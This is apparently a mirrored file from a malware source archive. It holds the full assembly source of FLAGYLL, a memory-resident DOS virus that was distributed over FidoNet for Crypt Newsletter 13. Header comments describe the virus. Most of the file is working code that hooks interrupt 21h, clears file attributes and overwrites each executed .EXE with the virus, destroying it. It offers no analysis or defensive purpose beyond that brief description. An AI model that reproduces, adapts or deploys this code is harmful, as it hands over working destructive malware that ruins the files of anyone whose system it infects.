mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
269 lines
7.5 KiB
NASM
269 lines
7.5 KiB
NASM
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
|
||
; Msg : 36 of 54
|
||
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
|
||
; To : - *.* - Fri 11 Nov 94 08:10
|
||
; Subj : FLAGYLL.ASM
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;.RealName: Max Ivanov
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;* Kicked-up by MeteO (2:5030/136)
|
||
;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
|
||
;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 17:38)
|
||
;* To : Bill Dirks
|
||
;* Subj : FLAGYLL.ASM
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;@RFC-Path:
|
||
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
||
;18.n283!not-for-mail
|
||
;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org
|
||
;FLAGYLL virus - edited for Crypt Newsletter 13
|
||
;FLAGYLL is a memory resident, overwriting virus which
|
||
;infects and destroys .EXE files on load.
|
||
;It updates the infected files time/date stamps to the time of
|
||
;infection so it can easily be followed.
|
||
;.EXE's infected by FLAGYLL are destroyed. DOS will either
|
||
;refuse to load them or FLAGYLL will become resident
|
||
;as they execute. These programs are ruined and can only
|
||
;be deleted. Because it is so destructive to files, FLAGYLL cannnot
|
||
;pose a threat in the wild, and in this respect, it is much
|
||
;inferior to the SUSAN virus included in this issue.
|
||
|
||
.radix 16
|
||
cseg segment
|
||
model small
|
||
assume cs:cseg, ds:cseg, es:cseg
|
||
|
||
org 100h
|
||
|
||
oi21 equ endflagyll
|
||
filelength equ endflagyll - begin
|
||
nameptr equ endflagyll+4
|
||
DTA equ endflagyll+8
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
begin: jmp install_flagyll
|
||
|
||
|
||
|
||
; install
|
||
install_flagyll:
|
||
|
||
mov ax,cs ; reduce memory size
|
||
dec ax
|
||
mov ds,ax
|
||
cmp byte ptr ds:[0000],5a ; check if last memory
|
||
jne cancel ; block
|
||
mov ax,ds:[0003]
|
||
sub ax,100 ; decrease memory
|
||
mov ds:0003,ax
|
||
|
||
|
||
copy_flagyll:
|
||
mov bx,ax ; copy to claimed block
|
||
mov ax,es ; PSP
|
||
add ax,bx ; virus start in memory
|
||
mov es,ax
|
||
mov cx,offset endflagyll - begin ; cx = length of virus
|
||
mov ax,ds ; restore ds
|
||
inc ax
|
||
mov ds,ax
|
||
lea si,ds:[begin] ; point to start of virus
|
||
lea di,es:0100 ; point to destination
|
||
rep movsb ; copy virus in memory
|
||
|
||
|
||
|
||
hook_21:
|
||
|
||
mov ds,cx ; hook interrupt 21h
|
||
mov si,0084h ;
|
||
mov di,offset oi21
|
||
mov dx,offset check_exec
|
||
lodsw
|
||
cmp ax,dx ;
|
||
je cancel ; exit, if already installed
|
||
stosw
|
||
movsw
|
||
|
||
push es
|
||
pop ds
|
||
mov ax,2521h ; revector int 21h to virus
|
||
int 21h
|
||
|
||
cancel: ret
|
||
|
||
check_exec: ; look over loaded files
|
||
pushf ; for executables
|
||
|
||
push es ; push everything onto the
|
||
push ds ; stack
|
||
push ax
|
||
push bx
|
||
push dx
|
||
|
||
cmp ax,04B00h ; is a file being
|
||
; executed ?
|
||
|
||
|
||
jne abort ; no, exit
|
||
|
||
do_infect:
|
||
call infect ; then try to infect
|
||
|
||
abort: ; restore everything
|
||
pop dx
|
||
pop bx
|
||
pop ax
|
||
pop ds
|
||
pop es
|
||
popf
|
||
|
||
exit:
|
||
; exit
|
||
jmp dword ptr cs:[oi21]
|
||
|
||
infect:
|
||
jmp over_id ; it's a vanity thing
|
||
|
||
note: db '-=[Crypt Newsletter 13]=-'
|
||
|
||
|
||
over_id:
|
||
|
||
|
||
|
||
mov cs:[name_seg],ds ; this routine
|
||
mov cs:[name_off],dx ; essentially grabs
|
||
; the name of the file
|
||
cld ; clear direction flags
|
||
mov word ptr cs:[nameptr],dx ; save pointer to the filename
|
||
mov word ptr cs:[nameptr+2],ds
|
||
|
||
mov ah,2Fh ; get old DTA
|
||
int 21h
|
||
push es
|
||
push bx
|
||
|
||
push cs ; set new DTA
|
||
|
||
pop ds
|
||
mov dx,offset DTA
|
||
mov ah,1Ah
|
||
int 21h
|
||
|
||
call host_ident ; find filename for virus
|
||
push di
|
||
mov si,offset COM_txt ; is extension 'COM' ?
|
||
|
||
mov cx,3
|
||
rep cmpsb
|
||
pop di
|
||
jz return ; if so, let it pass by
|
||
mov si,offset EXE_txt ; is extension .EXE ?
|
||
nop
|
||
mov cl,3
|
||
rep cmpsb
|
||
jnz return
|
||
|
||
|
||
|
||
do_exe: ; infect host, destroying it
|
||
|
||
mov ax,4300h ; clear attributes
|
||
mov ds,cs:[name_seg]
|
||
mov dx,cs:[name_off]
|
||
int 21h
|
||
and cl,0FEh
|
||
mov ax,4301h
|
||
int 21h
|
||
|
||
mov ds,cs:[name_seg] ; open file read/write
|
||
mov dx,cs:[name_off]
|
||
mov ax,3D02h
|
||
int 21h
|
||
jc close_file
|
||
push cs
|
||
pop ds
|
||
mov [handle],ax
|
||
mov bx,ax
|
||
|
||
push cs
|
||
pop ds
|
||
mov ax,4200h ;set pointer to beginning of host
|
||
|
||
push cs
|
||
pop ds
|
||
mov bx,[handle] ;handle to BX
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
|
||
|
||
|
||
mov ah,40 ;write to file
|
||
mov cx,filelength ;virus length in cx
|
||
mov dx,100 ;start write at beginning of Flagyll
|
||
int 21h ;do it
|
||
|
||
close_file: mov bx,[handle]
|
||
mov ah,03Eh ;close file, name -->BX
|
||
int 21h
|
||
|
||
mov ax,4C00h ;exit to DOS
|
||
int 21h
|
||
|
||
|
||
|
||
|
||
return: mov ah,1Ah
|
||
pop dx ; restore old DTA
|
||
pop ds
|
||
int 21H
|
||
|
||
ret ; let DOS regain control
|
||
|
||
|
||
host_ident: les di,dword ptr cs:[nameptr] ; finds filename for
|
||
mov ch,0FFh ; host selection
|
||
mov al,0
|
||
repnz scasb
|
||
sub di,4
|
||
ret
|
||
|
||
|
||
|
||
|
||
EXE_txt db 'EXE',0 ; extension masks
|
||
COM_txt db 'COM',0 ; for host selection
|
||
|
||
name_seg dw ? ;data buffers for
|
||
name_off dw ? ; viral use on the fly
|
||
handle dw ?
|
||
|
||
note2: db 'Flagyll' ; virus name
|
||
|
||
endflagyll:
|
||
|
||
cseg ends
|
||
end begin
|
||
|
||
;-+- GEcho 1.10+
|
||
; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718)
|
||
;=============================================================================
|
||
;
|
||
;Yoo-hooo-oo, -!
|
||
;
|
||
;
|
||
; þ The MeÂeO
|
||
;
|
||
;/3 Enable 32-bit processing
|
||
;
|
||
;--- Aidstest Null: /Kill
|
||
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
|
||
|